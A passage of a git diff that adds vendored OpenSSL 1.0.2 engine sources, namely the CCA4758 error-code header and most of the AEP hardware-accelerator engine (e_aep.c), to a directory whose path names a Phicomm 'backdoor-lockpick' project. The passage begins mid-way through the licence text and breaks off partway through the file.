+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_CCA4758_ERR_H
+# define HEADER_CCA4758_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_CCA4758_strings(void);
+static void ERR_unload_CCA4758_strings(void);
+static void ERR_CCA4758_error(int function, int reason, char *file, int line);
+# define CCA4758err(f,r) ERR_CCA4758_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the CCA4758 functions. */
+
+/* Function codes. */
+# define CCA4758_F_CCA_RSA_SIGN                           105
+# define CCA4758_F_CCA_RSA_VERIFY                         106
+# define CCA4758_F_IBM_4758_CCA_CTRL                      100
+# define CCA4758_F_IBM_4758_CCA_FINISH                    101
+# define CCA4758_F_IBM_4758_CCA_INIT                      102
+# define CCA4758_F_IBM_4758_LOAD_PRIVKEY                  103
+# define CCA4758_F_IBM_4758_LOAD_PUBKEY                   104
+
+/* Reason codes. */
+# define CCA4758_R_ALREADY_LOADED                         100
+# define CCA4758_R_ASN1_OID_UNKNOWN_FOR_MD                101
+# define CCA4758_R_COMMAND_NOT_IMPLEMENTED                102
+# define CCA4758_R_DSO_FAILURE                            103
+# define CCA4758_R_FAILED_LOADING_PRIVATE_KEY             104
+# define CCA4758_R_FAILED_LOADING_PUBLIC_KEY              105
+# define CCA4758_R_NOT_LOADED                             106
+# define CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL            107
+# define CCA4758_R_UNIT_FAILURE                           108
+# define CCA4758_R_UNKNOWN_ALGORITHM_TYPE                 109
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep.c
new file mode 100644
index 0000000..9bfda76
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep.c
@@ -0,0 +1,1166 @@
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/bn.h>
+#include <string.h>
+
+#include <openssl/e_os2.h>
+#if !defined(OPENSSL_SYS_MSDOS) || defined(__DJGPP__) || defined(__MINGW32__)
+# include <sys/types.h>
+# include <unistd.h>
+#else
+# include <process.h>
+typedef int pid_t;
+#endif
+
+#if defined(OPENSSL_SYS_NETWARE) && defined(NETWARE_CLIB)
+# define getpid GetThreadID
+extern int GetThreadID(void);
+#elif defined(_WIN32) && !defined(__WATCOMC__)
+# define getpid _getpid
+#endif
+
+#include <openssl/crypto.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#include <openssl/buffer.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_AEP
+#  ifdef FLAT_INC
+#   include "aep.h"
+#  else
+#   include "vendor_defns/aep.h"
+#  endif
+
+#  define AEP_LIB_NAME "aep engine"
+#  define FAIL_TO_SW 0x10101010
+
+#  include "e_aep_err.c"
+
+static int aep_init(ENGINE *e);
+static int aep_finish(ENGINE *e);
+static int aep_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+static int aep_destroy(ENGINE *e);
+
+static AEP_RV aep_get_connection(AEP_CONNECTION_HNDL_PTR hConnection);
+static AEP_RV aep_return_connection(AEP_CONNECTION_HNDL hConnection);
+static AEP_RV aep_close_connection(AEP_CONNECTION_HNDL hConnection);
+static AEP_RV aep_close_all_connections(int use_engine_lock, int *in_use);
+
+/* BIGNUM stuff */
+#  ifndef OPENSSL_NO_RSA
+static int aep_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                       const BIGNUM *m, BN_CTX *ctx);
+
+static AEP_RV aep_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *q, const BIGNUM *dmp1,
+                              const BIGNUM *dmq1, const BIGNUM *iqmp,
+                              BN_CTX *ctx);
+#  endif
+
+/* RSA stuff */
+#  ifndef OPENSSL_NO_RSA
+static int aep_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                           BN_CTX *ctx);
+#  endif
+
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+#  ifndef OPENSSL_NO_RSA
+static int aep_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                            const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+#  endif
+
+/* DSA stuff */
+#  ifndef OPENSSL_NO_DSA
+static int aep_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                           BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                           BN_CTX *ctx, BN_MONT_CTX *in_mont);
+
+static int aep_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                           const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                           BN_MONT_CTX *m_ctx);
+#  endif
+
+/* DH stuff */
+/* This function is aliased to mod_exp (with the DH and mont dropped). */
+#  ifndef OPENSSL_NO_DH
+static int aep_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                          const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                          BN_MONT_CTX *m_ctx);
+#  endif
+
+/* rand stuff   */
+#  ifdef AEPRAND
+static int aep_rand(unsigned char *buf, int num);
+static int aep_rand_status(void);
+#  endif
+
+/* Bignum conversion stuff */
+static AEP_RV GetBigNumSize(AEP_VOID_PTR ArbBigNum, AEP_U32 *BigNumSize);
+static AEP_RV MakeAEPBigNum(AEP_VOID_PTR ArbBigNum, AEP_U32 BigNumSize,
+                            unsigned char *AEP_BigNum);
+static AEP_RV ConvertAEPBigNum(void *ArbBigNum, AEP_U32 BigNumSize,
+                               unsigned char *AEP_BigNum);
+
+/* The definitions for control commands specific to this engine */
+#  define AEP_CMD_SO_PATH         ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN aep_cmd_defns[] = {
+    {AEP_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'aep' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD aep_rsa = {
+    "Aep RSA method",
+    NULL,                       /* rsa_pub_encrypt */
+    NULL,                       /* rsa_pub_decrypt */
+    NULL,                       /* rsa_priv_encrypt */
+    NULL,                       /* rsa_priv_encrypt */
+    aep_rsa_mod_exp,            /* rsa_mod_exp */
+    aep_mod_exp_mont,           /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    NULL,                       /* rsa_sign */
+    NULL,                       /* rsa_verify */
+    NULL                        /* rsa_keygen */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* Our internal DSA_METHOD that we provide pointers to */
+static DSA_METHOD aep_dsa = {
+    "Aep DSA method",
+    NULL,                       /* dsa_do_sign */
+    NULL,                       /* dsa_sign_setup */
+    NULL,                       /* dsa_do_verify */
+    aep_dsa_mod_exp,            /* dsa_mod_exp */
+    aep_mod_exp_dsa,            /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    NULL,                       /* dsa_paramgen */
+    NULL                        /* dsa_keygen */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* Our internal DH_METHOD that we provide pointers to */
+static DH_METHOD aep_dh = {
+    "Aep DH method",
+    NULL,
+    NULL,
+    aep_mod_exp_dh,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifdef AEPRAND
+/* our internal RAND_method that we provide pointers to  */
+static RAND_METHOD aep_random = {
+    /*
+     * "AEP RAND method",
+     */
+    NULL,
+    aep_rand,
+    NULL,
+    NULL,
+    aep_rand,
+    aep_rand_status,
+};
+#  endif
+
+/*
+ * Define an array of structures to hold connections
+ */
+static AEP_CONNECTION_ENTRY aep_app_conn_table[MAX_PROCESS_CONNECTIONS];
+
+/*
+ * Used to determine if this is a new process
+ */
+static pid_t recorded_pid = 0;
+
+#  ifdef AEPRAND
+static AEP_U8 rand_block[RAND_BLK_SIZE];
+static AEP_U32 rand_block_bytes = 0;
+#  endif
+
+/* Constants used when creating the ENGINE */
+static const char *engine_aep_id = "aep";
+static const char *engine_aep_name = "Aep hardware engine support";
+
+static int max_key_len = 2176;
+
+/*
+ * This internal function is used by ENGINE_aep() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_aep(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    const DSA_METHOD *meth2;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth3;
+#  endif
+
+    if (!ENGINE_set_id(e, engine_aep_id) ||
+        !ENGINE_set_name(e, engine_aep_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &aep_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &aep_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &aep_dh) ||
+#  endif
+#  ifdef AEPRAND
+        !ENGINE_set_RAND(e, &aep_random) ||
+#  endif
+        !ENGINE_set_init_function(e, aep_init) ||
+        !ENGINE_set_destroy_function(e, aep_destroy) ||
+        !ENGINE_set_finish_function(e, aep_finish) ||
+        !ENGINE_set_ctrl_function(e, aep_ctrl) ||
+        !ENGINE_set_cmd_defns(e, aep_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * aep-specific mod_exp and mod_exp_crt so we use those functions. NB: We
+     * don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    aep_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    aep_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    aep_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    aep_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+    /*
+     * Use the DSA_OpenSSL() method and just hook the mod_exp-ish bits.
+     */
+    meth2 = DSA_OpenSSL();
+    aep_dsa.dsa_do_sign = meth2->dsa_do_sign;
+    aep_dsa.dsa_sign_setup = meth2->dsa_sign_setup;
+    aep_dsa.dsa_do_verify = meth2->dsa_do_verify;
+
+    aep_dsa = *DSA_get_default_method();
+    aep_dsa.dsa_mod_exp = aep_dsa_mod_exp;
+    aep_dsa.bn_mod_exp = aep_mod_exp_dsa;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /* Much the same for Diffie-Hellman */
+    meth3 = DH_OpenSSL();
+    aep_dh.generate_key = meth3->generate_key;
+    aep_dh.compute_key = meth3->compute_key;
+    aep_dh.bn_mod_exp = meth3->bn_mod_exp;
+#  endif
+
+    /* Ensure the aep error handling is set up */
+    ERR_load_AEPHK_strings();
+
+    return 1;
+}
+
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_helper(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_aep_id) != 0))
+        return 0;
+    if (!bind_aep(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_helper)
+#  else
+static ENGINE *engine_aep(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_aep(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_aep(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_aep();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#  endif
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the Aep
+ * library. NB: This is only set (or unset) during an init() or finish() call
+ * (reference counts permitting) and they're operating with global locks, so
+ * this should be thread-safe implicitly.
+ */
+static DSO *aep_dso = NULL;
+
+/*
+ * These are the static string constants for the DSO file name and the
+ * function symbol names to bind to.
+ */
+static const char *AEP_LIBNAME = NULL;
+static const char *get_AEP_LIBNAME(void)
+{
+    if (AEP_LIBNAME)
+        return AEP_LIBNAME;
+    return "aep";
+}
+
+static void free_AEP_LIBNAME(void)
+{
+    if (AEP_LIBNAME)
+        OPENSSL_free((void *)AEP_LIBNAME);
+    AEP_LIBNAME = NULL;
+}
+
+static long set_AEP_LIBNAME(const char *name)
+{
+    free_AEP_LIBNAME();
+    return ((AEP_LIBNAME = BUF_strdup(name)) != NULL ? 1 : 0);
+}
+
+static const char *AEP_F1 = "AEP_ModExp";
+static const char *AEP_F2 = "AEP_ModExpCrt";
+#  ifdef AEPRAND
+static const char *AEP_F3 = "AEP_GenRandom";
+#  endif
+static const char *AEP_F4 = "AEP_Finalize";
+static const char *AEP_F5 = "AEP_Initialize";
+static const char *AEP_F6 = "AEP_OpenConnection";
+static const char *AEP_F7 = "AEP_SetBNCallBacks";
+static const char *AEP_F8 = "AEP_CloseConnection";
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+static t_AEP_OpenConnection *p_AEP_OpenConnection = NULL;
+static t_AEP_CloseConnection *p_AEP_CloseConnection = NULL;
+static t_AEP_ModExp *p_AEP_ModExp = NULL;
+static t_AEP_ModExpCrt *p_AEP_ModExpCrt = NULL;
+#  ifdef AEPRAND
+static t_AEP_GenRandom *p_AEP_GenRandom = NULL;
+#  endif
+static t_AEP_Initialize *p_AEP_Initialize = NULL;
+static t_AEP_Finalize *p_AEP_Finalize = NULL;
+static t_AEP_SetBNCallBacks *p_AEP_SetBNCallBacks = NULL;
+
+/* (de)initialisation functions. */
+static int aep_init(ENGINE *e)
+{
+    t_AEP_ModExp *p1;
+    t_AEP_ModExpCrt *p2;
+#  ifdef AEPRAND
+    t_AEP_GenRandom *p3;
+#  endif
+    t_AEP_Finalize *p4;
+    t_AEP_Initialize *p5;
+    t_AEP_OpenConnection *p6;
+    t_AEP_SetBNCallBacks *p7;
+    t_AEP_CloseConnection *p8;
+
+    int to_return = 0;
+
+    if (aep_dso != NULL) {
+        AEPHKerr(AEPHK_F_AEP_INIT, AEPHK_R_ALREADY_LOADED);
+        goto err;
+    }
+    /* Attempt to load libaep.so. */
+
+    aep_dso = DSO_load(NULL, get_AEP_LIBNAME(), NULL, 0);
+
+    if (aep_dso == NULL) {
+        AEPHKerr(AEPHK_F_AEP_INIT, AEPHK_R_NOT_LOADED);
+        goto err;
+    }
+
+    if (!(p1 = (t_AEP_ModExp *) DSO_bind_func(aep_dso, AEP_F1)) ||
+        !(p2 = (t_AEP_ModExpCrt *) DSO_bind_func(aep_dso, AEP_F2)) ||
+#  ifdef AEPRAND
+        !(p3 = (t_AEP_GenRandom *) DSO_bind_func(aep_dso, AEP_F3)) ||
+#  endif
+        !(p4 = (t_AEP_Finalize *) DSO_bind_func(aep_dso, AEP_F4)) ||
+        !(p5 = (t_AEP_Initialize *) DSO_bind_func(aep_dso, AEP_F5)) ||
+        !(p6 = (t_AEP_OpenConnection *) DSO_bind_func(aep_dso, AEP_F6)) ||
+        !(p7 = (t_AEP_SetBNCallBacks *) DSO_bind_func(aep_dso, AEP_F7)) ||
+        !(p8 = (t_AEP_CloseConnection *) DSO_bind_func(aep_dso, AEP_F8))) {
+        AEPHKerr(AEPHK_F_AEP_INIT, AEPHK_R_NOT_LOADED);
+        goto err;
+    }
+
+    /* Copy the pointers */
+
+    p_AEP_ModExp = p1;
+    p_AEP_ModExpCrt = p2;
+#  ifdef AEPRAND
+    p_AEP_GenRandom = p3;
+#  endif
+    p_AEP_Finalize = p4;
+    p_AEP_Initialize = p5;
+    p_AEP_OpenConnection = p6;
+    p_AEP_SetBNCallBacks = p7;
+    p_AEP_CloseConnection = p8;
+
+    to_return = 1;
+
+    return to_return;
+
+ err:
+
+    if (aep_dso)
+        DSO_free(aep_dso);
+    aep_dso = NULL;
+
+    p_AEP_OpenConnection = NULL;
+    p_AEP_ModExp = NULL;
+    p_AEP_ModExpCrt = NULL;
+#  ifdef AEPRAND
+    p_AEP_GenRandom = NULL;
+#  endif
+    p_AEP_Initialize = NULL;
+    p_AEP_Finalize = NULL;
+    p_AEP_SetBNCallBacks = NULL;
+    p_AEP_CloseConnection = NULL;
+
+    return to_return;
+}
+
+/* Destructor (complements the "ENGINE_aep()" constructor) */
+static int aep_destroy(ENGINE *e)
+{
+    free_AEP_LIBNAME();
+    ERR_unload_AEPHK_strings();
+    return 1;
+}
+
+static int aep_finish(ENGINE *e)
+{
+    int to_return = 0, in_use;
+    AEP_RV rv;
+
+    if (aep_dso == NULL) {
+        AEPHKerr(AEPHK_F_AEP_FINISH, AEPHK_R_NOT_LOADED);
+        goto err;
+    }
+
+    rv = aep_close_all_connections(0, &in_use);
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_FINISH, AEPHK_R_CLOSE_HANDLES_FAILED);
+        goto err;
+    }
+    if (in_use) {
+        AEPHKerr(AEPHK_F_AEP_FINISH, AEPHK_R_CONNECTIONS_IN_USE);
+        goto err;
+    }
+
+    rv = p_AEP_Finalize();
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_FINISH, AEPHK_R_FINALIZE_FAILED);
+        goto err;
+    }
+
+    if (!DSO_free(aep_dso)) {
+        AEPHKerr(AEPHK_F_AEP_FINISH, AEPHK_R_UNIT_FAILURE);
+        goto err;
+    }
+
+    aep_dso = NULL;
+    p_AEP_CloseConnection = NULL;
+    p_AEP_OpenConnection = NULL;
+    p_AEP_ModExp = NULL;
+    p_AEP_ModExpCrt = NULL;
+#  ifdef AEPRAND
+    p_AEP_GenRandom = NULL;
+#  endif
+    p_AEP_Initialize = NULL;
+    p_AEP_Finalize = NULL;
+    p_AEP_SetBNCallBacks = NULL;
+
+    to_return = 1;
+ err:
+    return to_return;
+}
+
+static int aep_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int initialised = ((aep_dso == NULL) ? 0 : 1);
+    switch (cmd) {
+    case AEP_CMD_SO_PATH:
+        if (p == NULL) {
+            AEPHKerr(AEPHK_F_AEP_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            AEPHKerr(AEPHK_F_AEP_CTRL, AEPHK_R_ALREADY_LOADED);
+            return 0;
+        }
+        return set_AEP_LIBNAME((const char *)p);
+    default:
+        break;
+    }
+    AEPHKerr(AEPHK_F_AEP_CTRL, AEPHK_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int aep_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                       const BIGNUM *m, BN_CTX *ctx)
+{
+    int to_return = 0;
+    int r_len = 0;
+    AEP_CONNECTION_HNDL hConnection;
+    AEP_RV rv;
+
+    r_len = BN_num_bits(m);
+
+    /* Perform in software if modulus is too large for hardware. */
+
+    if (r_len > max_key_len) {
+        AEPHKerr(AEPHK_F_AEP_MOD_EXP, AEPHK_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        return BN_mod_exp(r, a, p, m, ctx);
+    }
+
+    /*
+     * Grab a connection from the pool
+     */
+    rv = aep_get_connection(&hConnection);
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_MOD_EXP, AEPHK_R_GET_HANDLE_FAILED);
+        return BN_mod_exp(r, a, p, m, ctx);
+    }
+
+    /*
+     * To the card with the mod exp
+     */
+    rv = p_AEP_ModExp(hConnection, (void *)a, (void *)p, (void *)m, (void *)r,
+                      NULL);
+
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_MOD_EXP, AEPHK_R_MOD_EXP_FAILED);
+        rv = aep_close_connection(hConnection);
+        return BN_mod_exp(r, a, p, m, ctx);
+    }
+
+    /*
+     * Return the connection to the pool
+     */
+    rv = aep_return_connection(hConnection);
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_MOD_EXP, AEPHK_R_RETURN_CONNECTION_FAILED);
+        goto err;
+    }
+
+    to_return = 1;
+ err:
+    return to_return;
+}
+
+#  ifndef OPENSSL_NO_RSA
+static AEP_RV aep_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *q, const BIGNUM *dmp1,
+                              const BIGNUM *dmq1, const BIGNUM *iqmp,
+                              BN_CTX *ctx)
+{
+    AEP_RV rv = AEP_R_OK;
+    AEP_CONNECTION_HNDL hConnection;
+
+    /*
+     * Grab a connection from the pool
+     */
+    rv = aep_get_connection(&hConnection);
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_MOD_EXP_CRT, AEPHK_R_GET_HANDLE_FAILED);
+        return FAIL_TO_SW;
+    }
+
+    /*
+     * To the card with the mod exp
+     */
+    rv = p_AEP_ModExpCrt(hConnection, (void *)a, (void *)p, (void *)q,
+                         (void *)dmp1, (void *)dmq1, (void *)iqmp, (void *)r,
+                         NULL);
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_MOD_EXP_CRT, AEPHK_R_MOD_EXP_CRT_FAILED);
+        rv = aep_close_connection(hConnection);
+        return FAIL_TO_SW;
+    }
+
+    /*
+     * Return the connection to the pool
+     */
+    rv = aep_return_connection(hConnection);
+    if (rv != AEP_R_OK) {
+        AEPHKerr(AEPHK_F_AEP_MOD_EXP_CRT, AEPHK_R_RETURN_CONNECTION_FAILED);
+        goto err;
+    }
+
+ err:
+    return rv;
+}
+#  endif
+
+#  ifdef AEPRAND
+static int aep_rand(unsigned char *buf, int len)
+{
+    AEP_RV rv = AEP_R_OK;
+    AEP_CONNECTION_HNDL hConnection;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_RAND);
+
+    /*
+     * Can the request be serviced with what's already in the buffer?
+     */
+    if (len <= rand_block_bytes) {
+        memcpy(buf, &rand_block[RAND_BLK_SIZE - rand_block_bytes], len);
+        rand_block_bytes -= len;
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+    } else
+        /*
+         * If not the get another block of random bytes
+         */
+    {
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+
+        rv = aep_get_connection(&hConnection);
+        if (rv != AEP_R_OK) {
+            AEPHKerr(AEPHK_F_AEP_RAND, AEPHK_R_GET_HANDLE_FAILED);
+            goto err_nounlock;
+        }
+
+        if (len > RAND_BLK_SIZE) {
+            rv = p_AEP_GenRandom(hConnection, len, 2, buf, NULL);
+            if (rv != AEP_R_OK) {
+                AEPHKerr(AEPHK_F_AEP_RAND, AEPHK_R_GET_RANDOM_FAILED);
+                goto err_nounlock;
+            }
+        } else {
+            CRYPTO_w_lock(CRYPTO_LOCK_RAND);
+
+            rv = p_AEP_GenRandom(hConnection, RAND_BLK_SIZE, 2,
+                                 &rand_block[0], NULL);
+            if (rv != AEP_R_OK) {
+                AEPHKerr(AEPHK_F_AEP_RAND, AEPHK_R_GET_RANDOM_FAILED);
+
+                goto err;
+            }
+
+            rand_block_bytes = RAND_BLK_SIZE;
+
+            memcpy(buf, &rand_block[RAND_BLK_SIZE - rand_block_bytes], len);
+            rand_block_bytes -= len;
+
+            CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+        }
+
+        rv = aep_return_connection(hConnection);
+        if (rv != AEP_R_OK) {
+            AEPHKerr(AEPHK_F_AEP_RAND, AEPHK_R_RETURN_CONNECTION_FAILED);
+
+            goto err_nounlock;
+        }
+    }
+
+    return 1;
+ err:
+    CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+ err_nounlock:
+    return 0;
+}
+
+static int aep_rand_status(void)
+{
+    return 1;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+static int aep_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa, BN_CTX *ctx)
+{
+    int to_return = 0;
+    AEP_RV rv = AEP_R_OK;
+
+    if (!aep_dso) {
+        AEPHKerr(AEPHK_F_AEP_RSA_MOD_EXP, AEPHK_R_NOT_LOADED);
+        goto err;
+    }
+
+    /*
+     * See if we have all the necessary bits for a crt
+     */
+    if (rsa->q && rsa->dmp1 && rsa->dmq1 && rsa->iqmp) {
+        rv = aep_mod_exp_crt(r0, I, rsa->p, rsa->q, rsa->dmp1, rsa->dmq1,
+                             rsa->iqmp, ctx);
+
+        if (rv == FAIL_TO_SW) {
+            const RSA_METHOD *meth = RSA_PKCS1_SSLeay();
+            to_return = (*meth->rsa_mod_exp) (r0, I, rsa, ctx);
+            goto err;
+        } else if (rv != AEP_R_OK)
+            goto err;
+    } else {
+        if (!rsa->d || !rsa->n) {
+            AEPHKerr(AEPHK_F_AEP_RSA_MOD_EXP, AEPHK_R_MISSING_KEY_COMPONENTS);
+            goto err;
+        }
+
+        rv = aep_mod_exp(r0, I, rsa->d, rsa->n, ctx);
+        if (rv != AEP_R_OK)
+            goto err;
+
+    }
+
+    to_return = 1;
+
+ err:
+    return to_return;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
